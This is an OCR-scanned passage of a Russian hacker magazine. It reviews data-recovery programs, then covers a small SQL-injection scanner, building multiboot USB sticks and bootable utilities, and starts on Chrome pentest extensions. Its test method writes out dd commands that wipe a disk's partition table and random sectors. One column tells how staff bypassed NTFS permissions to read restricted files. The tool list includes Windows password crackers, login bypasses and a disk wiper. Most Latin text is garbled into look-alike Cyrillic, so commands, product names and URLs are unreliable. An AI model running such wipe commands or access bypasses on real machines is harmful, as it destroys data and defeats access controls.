необходимостью их восстановить, могу тебе сказать только одно - 
скоро тебе это предстоит :). Чтобы быть во всеоружии и не тратить 
время на поиск подходящего софта, мы выбрали для тебя самые 
толковые решения. Платные и бесплатные. 



Методика тестирования 

Если поспрашивать опытных друзей и коллег, какую программу 
они используют, когда часть файлов неожиданно канула в воду, то 
варианты будут самые разные. Признаюсь, и у меня есть вполне 
четкое представление, кто на что способен. Но чтобы придать объ- 
ективности этому материалу, мы решили провести полноценное 
тестирование. Для этого мы смоделировали три самые типичные 
ситуации и проверили, каксними справятся испытуемые приложе- 
ния. Ты и самнаверняка сталкивался с подобными задачами: 

1. Восстановление удаленных мимо корзины (<зЫ11+с1е1>) документов. 

2. Восстановление данных после быстрого форматирования (уда- 
ления таблицы файловой системы диска). 

3. Восстановление файлов после уничтожения таблицы разделов и 
частичного повреждения служебных структур файловой системы и 
данных (запись «мусора» в начало и произвольные места диска). 
Как были смоделированы условия для первых двух тестов, думаю, 



ни у кого вопросов не вызовет. Для организации третьего теста 
была использована любимая многими нашими читателями кон- 
сольная юниксовая утилита б б. С ее помощью, во-первых, была 
затерта таблица разделов командой зибо бб і-р=/беѵ/ 2 его о-Р=/ 
беѵ/збЬІ Ьб= 512 соигѵб=1 сопѵ=поеггог (збЫ —это диск, над 
которым проводились эксперименты). Во-вторых, были затерты 
случайные секторы на диске посредством применения некоторого 
количества раз команды Бибо бб і-р=/беѵ/ 2 его о-Р=/беѵ/5бЬ1 
Ьб= 512 соигѵб=1 5еек=п сопѵ=поеггог с разными значениями 
параметра п, где п — случайное числоиз диапазона от 1 до 511968 
(51 1 968 — количество секторов на испытуемом диске). С испытуе- 
мого раздела был снят образ, который накатывался обратно для 
теста каждой из программ. В итоге из 1 6 исследуемых приложений 
мы выбрали для обзора всего девять: 6 платных и 3 бесплатных. 
Бесплатные программы должны были выдержать хотя бы первые 
два теста, а платные — обязательно все три. Обзор начнем с по- 
следних. 





ІІР5 Ехріогег Ресоѵегу 

ОС: ѴѴі псіоѵѵз, І_іпих, ВЭР, МасОЭХ 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: ІЧТЕ5, ЕАТ, Ехі2, ЕхіЗ, Ехі4, ХР5, 

ЕЕ5, НЕ5, НР5+ 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский] 
СТОИМОСТЬ: € 21 ,95 - €1 29,95 

САЙТ: 



В том, что этот продукт пройдет все три теста, я даже не 
сомневался. ІІР5 Ехріогег Ресоѵегу находится в одном 
классе с Р-5іисІіо: как Мегсесіез 5- класса, но только 
не среди машин, а в сфере восстановления данных. 
Программа также всеядна в плане вида файловых 
систем и даже поддерживает по-настоящему экзоти- 
ческие файловые системы, вроде журналируемой ХР8. 
Создание образа диска или раздела? Разумеется. Вос- 
становление данных как с локальных, так и с сетевых 
носителей? Да, и даже больше: разработчики особенно 
подчеркивают возможность работы с І\ІА5 различных 
производителей. Единственное видимое отличие от 
Р.ЭіисІіо, пожалуй, в скорости работы: II РВ Ехріогег 
работает несколько медленнее. И на мой взгляд, про- 
грамма не так интуитивна в плане использования. 

Зато в плане цены решение более гибко. II РВ Ехріогег 
Ресоѵегупоставляется в нескольких редакциях — 
зіапсіагсі, ргоіеззіопаі и гаізе баіа гесоѵегу. Стоимость 
для домашнего использования соответственно €39,95, 
€49,95 и €21 ,95. Что интересно, версия ргоіеззіопаі в 
целом менее функциональна. Нов отличие от вер- 
сии зіапсіагсі заточена на работу с РАЮ-массивами и 
.ѵіт-файлами (виртуальными образами). Последняя 
версия (ил и точнее набор версий] — гаізе баіа гесоѵегу 
— самая простая и умеет работать только с одним из 
типов файловых систем (для каждой ФС есть своя гаізе- 
версия). 

Основные преимущества: возможность создания 
образа диска, простой и понятный интерфейс, работа с 
РАЮ и .ѵіт-файлами, работа во многих ОС, восстанов- 
ление данных в локальной сети. 

Основные недостатки: отсутствие бесплатной версии. 



ныи диск и применять его в случае, когда потеряны 
данные, необходимые для загрузки операционной 
системы. Теперь что касается цены. Стандартная 
версия стоит $79, но можно сэкономить и приобрести 
за $49 версию, которая будет поддерживать только 
одну из файловых систем — ЕАТ или ЫТРВ. Есть и более 
дорогие варианты, например, с возможностью вос- 
становления данных в локальной сети. 



Основные преимущества: возможность создания 
образа диска, простой и понятный интерфейс, работа с 
РАЮ, восстановление данных в локальной сети, созда- 
ние загрузочного диска. 

Основные недостатки: цена. 
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Р-51ис1іо 



ОС: ѴѴіпсІоѵѵз 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: РАТ1 2/1 6/32/ехРАТ. ЫТР5, НРБ/ 

НР5+, ІІЕ51ДІЕ52, Ех(2/Ех(3/Ехі4 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский] 

СТОИМОСТЬ: $79 -$179 
САЙТ: 

Р-зІибіо недаром открывает наш обзор, это одно из са- 
мых известных решений для восстановления данных. 

С классным интерфейсом и шустрой скоростью работы. 
Помимо того, что приложение прекрасно справилось 
со всеми тремя тестами, ему есть чем еще похвастать- 
ся. Так, Р-5іисІіо умеет создавать файл -об раз диска 
или раздела, с которого предполагается восстанавли- 
вать данные. Это крайне полезная опция втом случае, 
если есть риск, что носитель физически неисправен 
и вот-вот прикажет долго жить. Еще одна важная и 
актуальная особенность Р-5іисІіо — восстановление 
информации с разделов, которые были объединены 
в РАЮ-массив. Работа с программным и аппаратным 
РАЮ реализована прекрасно сточки зрения удоб- 
ства — в большинстве случаев, массивы распозна- 
ются автоматически и доступны наравне с обычными 
жесткими дисками. Но если по каким-либо причинам 
этого не произошло, программа позволяет создать 
виртуальный массив и работать с ним как с реальным. 
Главное — знать порядок расположения дисков в нем. 
С помощью Р-Эіисііо можно также создать загрузоч- 




> іпіо 

Стоит отметить суще- 
ствование программ, 
предназначенных 
для восстановле- 
ния исключительно 
мультимедийных 
файлов (например, 
Рбоіо Ресоѵегу бепіиз, 
Різкіпіегпаіз Ріазб 
Ресоѵегу]. Эти при- 
ложения, в большин- 
стве своем, способны 
пройти только первый 
из нашихтестов, а 
потому, казалось бы, 
бессмысленно их рас- 
сматривать. Ноучти! В 
некоторыхузкоспециа- 
лизированных случаях 
они могут оказаться 
эффективнее стан- 
дартных решений. 
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КкоѵегМуРіІт 




Рііе Зсаѵепдег 

ОС: ѴѴі псіоѵѵз 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: ЕАТ, ІЧТЕ5 




ЯЗЫК ИНТЕРФЕЙСА: многоязычный (русского нет] 

СТОИМОСТЬ: $49,95 
САЙТ: 











КесоѵегМуРІІез 

ОС: ѴѴіпсІоѵѵз 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: РАТ, ІЧТР5, НР5, НР5+ 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (русского нет] 
СТОИМОСТЬ: $69,95 - $299,90 

САЙТ: ѵѵѵѵѵѵ.гесоѵегтѵРІез.сот 

Эта программа вполне может составить конкуренцию 
ЕІІеЗсаѵепдегпо части минималистичности интерфейса 
и юзабилити. На главном экране перед пользователем 
предстает всего две кнопки — восстановление файлов и 
восстановление раздела диска. Скорость работы на вы- 
соте, хоть она и ниже, чем у Рііе Эсаѵепдег. РесоѵегМуЕіІез 
умеет работать с основными файловыми системами 
ѴѴіпсІоѵѵз и Мае 05Х, но разработчики в скором будущем 
обещаюттакже поддержку ЕХТ2 и ЕХТЗ. Решение по- 
ставляется в трех версиях, младшая из которых стоит ни 
много ни мало $69,95. 

Основные преимущества: минималистичный интер- 
фейс, работа с РАЮ, скорость работы. 

Основные недостатки: мало поддерживаемых файло- 
вых систем, цена. 



I ] Ъ-т I 




На диске мы собрали 
для тебя подборку 
тех утилит, которые 
успешно справились с 
нашими тестами. 



Небольшая, но богатая по функционалу программа. Раз- 
мер Рііе Эсаѵепдег составляет менее 1 Мб, но это не по- 
мешалотулзе справиться стестами «на ура». Интересно, 
что прогу необязательно даже уста на вливать на компью- 
тер — существует возможность запуска портативной вер- 
сии. Рііе Эсаѵепдег отличается поразительной быстротой 
работы. Остальные решения из обзора явно проигрывают 
ей по этому показателю. Приятно радует минималистич- 
ный интерфейс: для восстановления данных достаточно 
буквально нескольких кликов. Но несмотря на кажу- 
щуюся простоту, решение более чем функционально. 
Помимо восстановления данных на локальных дисках 
поддерживается работа с сетью. Приложение знакомо и 
с восстановлением файлов с РАЮ-массивов. При этом 
разработчики незанимаются маркетингом, предлагая 
десять тысяч разных версий по астрономическим ценам. 
Рііе Эсаѵепдегсо всем доступным функционалом постав- 
ляется в единственной версии и стоит $49,95. 

Основные преимущества: минималистичный ин- 
терфейс, работа с РАЮ, работа с локальной сетью, 
скорость работы. 

Основные недостатки: мало поддерживаемых файло- 
вых систем. 
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3 золотых 
правила 
восстанов- 
ления 
данных 



1. Никогда не сохраняй восстанавливаемую информацию на тот же носитель (или тот же раздел носи- 
теля)! Забудь о любых операциях записи на него. Профессионалы даже используют специальные 
блокираторы записи, чтобы исключить возможные воздействия на носитель. 

2. Если твой носитель «дышит на ладан», то активно работать с ним для восстановления данных 
чревато. Сначала создай образ жесткого диска и работай уже с ним. Некоторые из представлен- 
ных в обзоре программ предоставляют такой функционал. 

3. Если ты не уверен в своих силах, или информация, находящаяся на носителе, слишком важна — 
лучше не пробуй заниматься восстановлением самостоятельно. Доверь это профессионалам. После 
неумелых дилетантских потуг легко может выйти так, что данные не смогут восстановить даже профи. 



► 024 
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ЕазуРесоѵегу 

ОС: ѴѴіпсІоѵѵз 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: РАТ, ІЧТЕ5 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский] 

СТОИМОСТЬ: от 6458 руб. 

САЙТ: 

ЕазуРесоѵегу — младшая сестра предыдущих двух про- 
грамм. Она обладаетуже куда более скромным функциона- 
лом, но все наши тесты прошла на «отлично». ЕазуРесоѵегу 
умеет работать только в двух файловых системах — РАТ 
и ІЧТЕ5, что выдаетее ориентированность на домашних 
пользователей. Но есть и некоторые приятные особенно- 
сти. Во-первых, прога имеет достаточно мощный аппарат 
для диагностики диска (тест наличия потенциальных ап- 
паратных проблем), а во-вторых, предлагает средства ре- 
ставрации поврежденных файлов М5 ОРРісе и гір-файлов. 
Стоит отдельно отметить режим работы «РаѵѵРесоѵегу». В 
этом режиме ЕазуРесоѵегу сканирует носитель и собира- 
ет файлы по частям на основании имеющихся сигнатур. 
Сигнатура — это характерный фрагмент, по которому можно 
понять, что файл относится копределенномутипу. Список 
имеющихся сигнатур впечатляет, при этом, воспользовав- 
шись предложенными инструментами, сигнатуры можно 
добавить и самому. К сожалению, даже самая простая 
лицензия стоит очень недешево — более бтысяч рублей. 

Основные преимущества: простой интерфейс, ап- 
парат для диагностики диска, средства реставрации 
поврежденных файлов М5 ОіТісе и 2 Ір-файлов. 
Основные недостатки: мало поддерживаемых файло- 
вых систем, цена. 



ОеЮаіаВаск 

ОС: ѴѴіпсІоѵѵз 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: ЕАТ, ІЧТЕ5 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский) 

СТОИМОСТЬ: $69-$79 

САЙТ: 

Внимательный читатель возможно заметит: 
ОеЮаІаВаск является платной программой, и она не 
смогла пройти третий тест, однако все же попала в об- 
зор. Тут надо сделать оговорку. Восстановление данных 
— процесс достаточно непредсказуемый. Вариантов 
порчи данных и самого диска великое множество. 
Поэтому невозможно точно сказать, какое решение 
лучшее. Очевидно, что прога не справилась со смоде- 
лированным нами тестом, но в то же время ОеЮаІаВаск 
давно зарекомендовала себя, как профессиональный 
инструмент восстановления данных, который в состоя- 
нии справиться со многими серьезными поломками. 
Сильным преимуществом утилиты является возмож- 
ность восстанавливать файлы на удаленных дисках в 
локальной сети. Программа имеет две версии — для 
ЫТЕ5 и ЕАТ, стоимостью $79 и $69 соответственно. 

Основные преимущества: скорость работы, работа с 
локальной сетью. 

Основные недостатки: мало поддерживаемых файло- 
вых систем. 
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Результаты тестов 





Тесті 


Тест 2 


ТесгЗ 


Стоимость 


Р-Біисііо 
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+ 


$79 - $179 


11Р5 Ехріогег Ресоѵегу 


+ 


+ 


+ 


€21.95-6129.95 


ЕазуРесоѵегу 


+ 


+ 


+ 


$230 -$3300 


Рііе Бсаѵепдег 
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$49.95 


РесоѵегМуРіІе 
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$69.95 -$299.90 
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Бесплатные решения 




Кесиѵа 



Р.Заѵег 



ОС: ѴѴіпсІоѵѵз 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: РАТ, ІМТЕ8 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский) 

САЙТ: 



ОС: ѴѴіпсІоѵѵз 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: РАТ, ІМТЕ8 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский) 

САЙТ: 



Известная и хорошо разрекламированная на западе 
программа, которую без конца хвалятзападные блоге- 
ры. И, в общем-то, есть за что. Ресиѵа смогла без труда 
преодолеть два первых нашихтеста, быстро справив- 
шись с восстановлением случайно удаленных файлов. 
Впринципеименнотаки позиционируют ее разработ- 
чики. Быстрое сканирование раздела занимает, как 
правило, не больше минуты. Для сложных случаев есть 
более глубокие режимы поиска удаленных данных. Но 
даже в этом случае восстановление данных с носителя 
с поврежденной таблицей разделов программе оказа- 
лось не по зубам. 



Р.8аѵег — это относительно новый продукт, ноуже завоевавший уважениеу многих 
специалистов по восстановлению данных. По сути, это не что иное, какурезанная 
версия профессионального ІІР8 Ехріогег Ресоѵегу. Поэтому нет ничего удивитель- 
ного, что среди бесплатных приложений прога выглядитсерьезнее всего. Она 
единственная справилась со всеми тремя тестами. Р.Заѵег работает без установки 
и предлагает восстановление данныхсдвух наиболее распространенныху обычных 
юзеров файловых систем — РАТ и ЫТЕ8. Ктомуже приложение можно использовать, 
как инструмент для доступа ксамым разным файловым системам: Арріе Мае 08 
(НР8, НР8+/НР8Х), І_іпих (Ехі2, ЕхіЗ, Ехі4, РеізегР8, ЗР8 и ХР8) и т.д. Учитывая, что 
большинству из нас нафиг не сдалась работа с РАЮ-массивами и восстановление 
данных по сети, Р.8аѵег в большинстве случаев ничуть не проигрывает коммерче- 
ским продуктам. Проведенныетесты — лишнеетому подтверждение. 



Основные преимущества: простота использования. Основные преимущества: широкий функционал. 

Основные недостатки: недостаточная функциональность. Основные недостатки: мало поддерживаемых файловых систем. 





РС ІЫ5РЕСТОР Рііе Ресоѵегу 

ОС: ѴѴіпсІоѵѵз 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: РАТ, ІМТР8 

ЯЗЫК ИРІТЕРФЕЙСА: многоязычный (включая русский) 

САЙТ: 

Этот продукт от немецких разработчиков также, как и Ресиѵа, смог пройти 
только два первых теста. И хотя производителем заявлена возможность вос- 
становления данных в ситуации, когда «у диска отсутствует буквенный иден- 
тификатор или диск недоступен», полное отсутствие загрузочного раздела 
ему все же оказалось не по зубам. У решения есть также специальная версия 
РС ІІМ8РЕСТ0Р 8тагІ Ресоѵегу, специально заточенная для восстановления 
файлов с карт памяти и флешек. 



Основные преимущества: минималистический интерфейс. 
Основные недостатки: недостаточная функциональность. 



Если подводить итоги 

Конечно, наши тесты едва ли могут дать ответ: «Какая из программ лучшая?». Да и никто не может. Среди специалистов наибольшее 
уважение вызывают Р-8іисІіо и ІІР8 Ехріогег Ресоѵегу. Последняя дешевле и имеет версии сразу под несколько операционных систем. 
Впрочем, в большинстве случаев в них нет необходимости. Ты и сам убедился, что бесплатная Р.8аѵегсправляется с наиболее типичны- 
ми ситуациями ничуть не хуже. Поэтому если вдруг и возникли проблемы, то начать их решение я рекомендую именносее помощью, □с 
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ШШШШ 

■ ■ Мирослав Стампар (ипсопсіоизтіпсІ.ЫодзроІ.сот) 




РгаоЫ-СопсерІ 

Разработать сканер ЗОЬуязвимостей 
меньше 1 00 строк кода 



О Когда смотришь на коммерческие 
сканеры безопасности, то подчас 
удивляешься: «За что клиенты платят 
столько денег?». Занимаясь последние 
несколько лет разработкой открытого 
проекта зцітар (здІтар.зоигсеТогде.пеТ) . 
я все чаще убеждаюсь, что многие 
продукты относятся к проблеме поиска 
ЗОЬинъекций спустя рукава. До 
смешного простые приемы вроде 
отправления 501. (например, добавляя 
символы вроде «')» в качестве значения 
параметров) и примитивные проверки на 
слепые инъекции (вроде «А1№ 1=1») не 
стоят того, чтобы просить за них не одну 
сотню баксов. Большинство из таких 
программ выдают невыносимо большое 
количество ложных срабатываний, 
опираясь в большинстве своем на 
ошибках РВМЗ, которые сами по себе 
еще ничего не доказывают. Нужно ли 
говорить, есть ли толк от таких 
прекрасных отчетов? 



Что я сделал? Чтобы показать, чего стоят все эти проверки 
в коммерческих сканерах, я решил написать небольшую 
утилиту, обязательно меньше 1 00 строчек кода, которая 
по функционалу была бы лучше или, по крайней мере, не 
хуже большинства этих переоцененных коммерческих 
сканеров. Если по эффективности она не будетуступать 
платным продуктам, то их разработчикам придется на- 
много усерднее делать свою работу, чтобы привлечьоб- 
ратно своих клиентов. Так родилась утилита йатп Втаіі 
БОШ Всаппег (0553), которую я написал на Руібоп. И да, 
сейчас в ней — 98 строчек кода. 

Сканер поддерживаетсканирование на глубину одного 
линка, игру с параметрами (ЗОЕ роізопіпд), обработку 
сообщений об ошибках и определение двенадца- 
ти разныхтипов йВМЗ (МуЗОЕ, Огасіе, РозІдгеЗОЕ, 

М іеговой ЗОИ Зегѵег и т.д.), динамические нагрузки для 
слепых инъекций с использованием наиболее рас- 
пространенных суффиксов и префиксов с продвинутым 
определением ответов сервера. Последние реализуются 
путем автоматического анализа заголовка страницы, 
ее длины, кода ответа НТТР (200, 404, и т.д.), а также не- 
четкого сравнения содержимого страницы (при помощи 
стандартного Руібоп-модуля біМіЬ]. Короче говоря, 
получилось очень толково. 

Предлагаю всем скачать и изучить код Оаппп Зтаіі 50Иі 
Зсаппег ( дііІіиЬ.со 55]. модифицировать 

его под себя и использовать для поиска потенциальных 
уязвимостей в своих разработках. И помни, если ты не 
сорвешь фрукты, которые низко висят, это точно сделает 
кто-то другой, т 




Оригинальный текст 
Мирослава на 
английскомты 
можешь посмотреть 
на ОѴО-диске. 




98 строчек кода 0555 




Оатп 5таІІ 500 5сатег нашел две возможные 
5С1-уязвимости 
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Не знаю как ты, а я сделал загрузоч- 
ную флешку с ѴѴіпсіоѵѵб 7 на борту по 
инструкции из прошлого номера. 
Подвернулся повод: коллега, закрывая 
документ, отказалась от сохранения измене- 
ний последних трех часов работы и прибе- 
жала к засидевшимся в редакции с мольбой 
о помощи :). Очень скоро стало ясно, что 
свежей версии документа нет нигде и ни в 
каком виде, кроме как в скриншотах (да и 
то — лишь с некоторой долей вероятности), 
которые автоматически генерятся системой 
учета за работой сотрудников. Файлы хра- 
нятся локально (что очень странно), но 
доступ к ним есть только у админа. Админа в 
позднее время уже не было. А вопрос горел. 
В общем, в голову нам не пришло ничего 
лучше, чем создать загрузочную флешку, с 
которой можно загрузиться и обратиться к 
файлам на жестком диске, обойдя политику 
безопасности ІЧТЕ5. Но не об этом речь. 
Главное — флешка с ѴѴіп7РЕ оказалась в 
нашем распоряжении. По ходу дела у кого- 
то возник вопрос: а как уместить на носите- 
ле сразу несколько систем? Скажем, 

ѴѴіп7РЕ, Васкігаск и какой-нибудь дистри- 
бутив для сброса админского пароля? 

Мы уже проделывали когда-то такой трюк. 
Для этого заливали на флешку загрузчик 
дгиЬ4сІ05 с помощью утилиты дгибіпзі 
( боѵѵпІоаб.дпа.огд/дгиЬиіШ и потом вручную 
редактировали конфиг тепи.ізі:, добавляя 
для каждой системы описание ее 150-файла. 
Это не самый удобный способ — гораздо 
сподручнее создавать мультизагрузочную 
флешку с помощью одной из специальных 




КОЛОНКА РЕДАКТОРА 

ПРО МУЛЬТИ- 
ЗАГРУЗОЧНУЮ 
ФЛЕШКУ 



УТИЛИТ: 

• VII МІ ( ѵѵѵѵѵѵ.репсігіѵеііпих.сопп ): 

• 5АР01І ( \А/уѵѵѵ.5агсІиссІ.іі ): 

• ХВООТ ( зіІез.доодІе.сот/зіІе/збатигхЬооІ: ). 

Тут дело не только в удобном 0111- 
интерфейсе, но и в большом количестве 
преднастроек для загрузчика для каждой 
конкретной ОС. Посмотрим, как это работает, 
на примере ХВООТ. 

1. Процесс создания мультизагрузочной 
флешки до безобразия прост. В общем 
случае — нужно просто бгад’п’сігор-нуть 
150’шки, которые ты хочешь записать 
на флешку или диск на вкладке «Сгеаіе 
МиШЬооІ ІІ5В/І50». Для многих образов 
автоматически происходит распознавание 
типа дистрибутива (правда, в тупую — по 
имени файла): от этого зависят параметры 
конфигурации загрузчика, в том числе 
название пункта меню, которое будет 
появляться во время запуска, и раздела, в 
которой эта система попадет (Ыпих, ІЛіІіІу и 
т.д.). Так, для ОІТІіпе І\ІТ РаззѵѵогсІ & Редізігу 
Есіііюг и Васкігаск программа даже ничего 
не спросила и просто добавила системы в 
список. Для всех мало-мальски популярных 
дистрибутивов будет точно так же. 

2 . С собственными сборками чуть сложнее. 
Для моего образа загрузочной «семерки» 
автоматическое распознавание не сработа- 
ло, и ХВООТ предложила выбрать дистри- 
бутив из огромного выпадающего списка. 

К счастью, в нем оказался подходящий 
пункт «РЕ, М50АРТ, ЕРй (ѴѴіпсІоѵѵз Ѵізіа 
& 7 о п Іу. ) » . Сложно представить, что под- 
ходящей конфигурации ты не найдешь, но 




если вдруг — используй пункт «Абб изіпд 
0гиЬ4боз ітаде Етиіабоп». Это наиболее 
универсальный вариант настройки. 

3. Дальше можно создать 150’шку или же 
сразу перенести все файлы и загрузчик на 
флешку. В последнем случае необходимо 
выбрать диск (флешку), а также исполь- 
зуемый бутлоадер (Зузііпих, который пред- 
лагается по умолчанию, или 0гиЬ40оз). 

Все остальное программа сделает за тебя. 
Работоспособность как готового образа, 
так и загрузочной флешки можно тут же 
проверить на виртуальной машине ОЕМІІ, 
которая уже встроена в ХВООТ. Если все 
прошло хорошо, то ты сразу увидишь нека- 
зистое (ну правда!) меню загрузчика для 
выбора системы. Поменять порядок пунктов 
в меню и внести любые другие коррективы 
ты по-прежнему можешь вручную в конфиге 
5узІіпих.сбд. 

4 . Собственно, все готово, но есть несколь- 
ко нюансов. 

• Если что-то не запустится под ѴМѵѵаге/ 
ОЕМІІ/ѴігіиаІВох, это еще не значит, что 
это действительно не работает. Попробуй 
загрузиться на реальной системе: есть все 
шансы, что на самом деле все более чем 
работоспособно. 

• Для создания тиШЬооІаЫе-флешки 
крайне рекомендуется использовать 
ЕАТ32. В случае с ЫТЕ5 некоторые Ыпих- 
дистрибутивы не заработают. Если тебя 
беспокоит ограничение раздела ЕАТ32, 
просто отформатируй носитель с помощью 
РРргерІІЗВ Іооі ( зііез.доодіе.сот/зііе/ 
гтргеризЬ ). которая позволяет сделать раз- 
дел до 2 Тб. 

• И последнее. Для работы ХВООТ в 
системе должен быть установлен .ЫЕТ 
Егатеѵѵогк 4. Если программа будет 
вываливаться, ссылаясь на отсутствие 
библиотеки РОК.ЕхІепзіопз, то решается это 
скачиваением сііі-ек с сайта бпрехіепгіопз. 
соберіех.сопп и размещением их папке 

% ѵѵі п б і г%/ зу зі е т 3 2 . 

Чтобы лучше понимать, зачем тебе это 
может пригодиться, мы отобрали самые 
лучшие загрузочные системы. Схема — 
справа. 



Тестируем загрузочную флешку в ОЕМІІ Выбираем образы для компиляции 
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Антивирусы 



Сложно придумать более эффективный способ справиться с малва- 
рью, которая уже обосновалась в системе, чем загрузиться в неза- 
висимую ОС и запустить толковый антивирусный сканер. Ксчастью, 
сейчас все антивирусные компании какодин смастерили загрузоч- 
ные версии своих продуктов. В доказательство привожу этот длинный 
список І_іѵе ОС с различными антивирусами на борту. 



• Р-5есиге Резсие СО 

• ІЧогІоп ВооІаЫе РесоѵегуТооІ 

• Аѵіга АпбѴіг Резсие Зузіет 

• Казрегзку «Каѵ Резсие Сй» 

• Рапба Ваію СсІ 

• АѴ6 Резсие Сй 



• ВіШеІюпсІег Резсие Сй 

• Ог.ѴѴеЬ ЫѵеСО 

• еВсап Резсие йізк 

• ООаІа АпбѴігиз Етегдепсу Вузіет 

• Асгопіз Апіітаіѵѵаге Сй 

• ІІЬипІи Маіѵѵаге РетоѵаІТооІкіІ 



Управления разделами 
жесткого диска 



Восстановление 

системы 



<1 






Г# 

' Ьп і ■ 







СІопе2іІІа 

Идеальная замена 
легендарному ІЧогІоп 
Обоз! для клони- 
рования дисков, а 
также создания об- 
разов разделов для 
быстрого восстанов- 
ления системы. 



Рагіесі Мадіс/ 
ВРагІесІ 

Редактор разделов, 
инструмент для рабо- 
ты с образами, тулза 
для восстановления 
загрузочныхзапи- 
сей, а также редактор 
таблицы разделов — 
в одном флаконе. 



РІМВ (Рагбтаде Із 
ІЧоЮИозі) 

І_і ѵе С 0 - д и стр и бути в , 
позволяющий вы- 
полнять разметку 
жесткого диска, 
делать бэкап данных, 
восстанавливать 
удаленные файлы, 
реанимировать БИОС. 



ВузІетРезсиеСсІ 

Специальный дис- 
трибутив для восста- 
новления системы 
после сбоя и потери 
части данных. 



Тгіпііу Резсие Кі* 

Загрузочный на- 
бор утилит для 
восстановления 
работоспособности 
ѴѴіпсІоѵѵз-системы, 
включающий по- 
мимо прочего 5 анти- 
вирусных продуктов. 



Ресіо Васкир І_іѵе СО 

Отличная разработ- 
ка, призванная взять 
на себя обязанности 
по бэкапу данных. 



Обход систем авторизации 



Загрузка через сеть 



прЬсгаск 

ОрЬсгаск І_іѵе 

Система для взлома 
І_М/І\ІТІ_М хэшей 
паролей ѴѴіпсІоѵѵз 
с использованием 
радужныхтаблиц. 



(Жііпе МТРаззѵѵогсІ 
& Редізігу Есіііог 

Инструмент на тот 
случай, если нужно 
обнулить пароль 
какого-то из поль- 
зователей ѴѴіпсІоѵѵз- 
системы или внести 
какие-то изменения в 
ее реестр, не имея со- 
ответствующих прав. 




Коп-Воо* 

Этот пакет, записан- 
ный на флешку, по- 
зволит залогиниться 
в установленную на 
компьютере систему, 
причем неважно 
ѴѴіпсІоѵѵз или Ыпих, 
с правами админи- 
стратора. 




ѴУ« 

Т1_МГ 

Если в систему 
не войти, можно 
использовать этот 
Ыѵе-дистрибутив, 
построенный на базе 
І_іпих, но полно- 
стью повторяющий 
интерфейс ѴѴіпсІоѵѵз 
ХР и позволяющий 
запускать виндовые 
приложения под ѴѴіпе. 



3 

пеІЬооІ.те 

Совершенно чу- 
десная разработка, 
которая при наличии 
доступа в Сеть позво- 
литзапустить одну из 
дюжины различных 
систем, автомати- 
чески подгрузив не- 
обходимые данные 
из инета. 



МеІВооІСО 

А этот и н струм е нт п о- 
еле загрузки сам ска- 
чает необходимые 
файлы и установит 
выбранную Ыпих ОС 
на компьютер. 



Диагностика проблем 



Собственная безопасность 




Мет*ез186+ 

Высокоэффективный 
тестоперативной 
памяти, позволяю- 
щий выявить ошибки 
в модулях РАМ, часто 
приводящих к не- 
стабильности работы 
компьютера. 




Мадіс Вооі Оізкс 

мной 

Самое популярное 
бесплатное решение 
для низкоуровневой 
диагностики жестких 
дисков. 




ІІШтаІе Воо* Сй 

Сборка из более 1 00 
утилит, с помощью 
которых ты можешь 
провести диагности- 
кужелеза и выявить 
многие проблемы. 



ікі@іл5ітоп 

МЦВЫІ 

Іпдиізііог І_іѵе 

Набор бенчмарков, 
состоящий из разно- 
образных инструмен- 
тов для тестирования 
установленного в 
компьютере железа. 



о 

нм# 

Оагік’з Воо* 

Апсі Мике 

Оченьопасная вещь! 
Сразу при загрузке 
намертво удалит 
все файлы сжестких 
дисков, затерев их 
несколько раз (для 
верности) случайны- 
ми данными. 



Тбг 

Таііз 

Система для аноним- 
ного выхода в Интер- 
нет без логов и стро- 
го по защищенному 
Тог-соединению. 
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о Очень многие впечатляются и радуются скорости работы боодіе СНгоше, 
но удивительное дело, даже не пробовали подключить дополнительные 
расширения. Какая глупость! Толковых аддонов пока действительно не 
так много, но уже сейчас есть набор расширений, которые могут 
пригодиться для пенстеста. Впрочем, большинство из них с большой 
вероятностью окажутся полезными и для вполне мирных целей. 



► 030 
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Сбор информации 
и Ріпдегргіпііпд 



Аудит чаще всего начинается с анализа тех технологий и инструментов, которые исполь- 
зуются веб-приложением. Применялся ли какой-то готовый движок, на каком веб-сервере 
все крутится, есть ли еще сайты, которые хостятся на том же сервере (и возможно уязви- 
мы) — ответы на эти вопросы дадут специальные расширения. 



в сІіяНЬѵігі 

Апліуі^ея 

гТ] бмрів АмИуІ[« 

Апліуіій 

^ ]Оивгу 

О. ОиіпісляІ 

АпаІуІ^я 

@ ШвгсІРтвя 

СМ3 

Экч 




ѴѴарраІуіег ЬіМу/оТІаІК 

Этотаддон изначально разработан для РігеЬх, а потому 
ты, возможно, с ним уже знаком. Сейчас это, пожалуй, 
лучшее решениедля определениятехнологий, которые 
применялисьдля построения ресурса. Большинство 
движков СМ5/форумов/блогов имеют ряд характерных 
признаков, по которым можно распознать факт их ис- 
пользования. Например, тег<теІа пате=«депегаІог» 
сопІепІ=«ѴѴогсІРге55 3.1 »/> недвусмысленно указывает 
на то, что сайт построен на движке ѴѴогсІРгезз. Чем за- 
нимается ѴѴарраІугег, та к это исследует исходники стра- 
ницы и пытается распознать подобные метки. В базе 
ѴѴарраІугег есть данные по всем самым популярным 
решениям для создания порталов, блогов, форумов, 
хостинг-панелей, электронных магазинов. 



СЬготеЗпіГСег 

Ьіі.Іу/яМЬх 

СИ готе Бпі^ег во многом повто- 
ряет функционал ѴѴарраІугег’а 
и выполняетИпдегргіпНпд 
используемых на странице 
фреймворков, движков и 35- 
библиотек. Всего в базе сейчас 
находятся слепки 1 00 популяр- 
ных инструментов. В случае 
удачного распознавания их 
иконки отображаются прямо в 
адресной строке. 



ІР Асісігезз іггіогтаііоп 

Ы!.1у/о93|Х| 

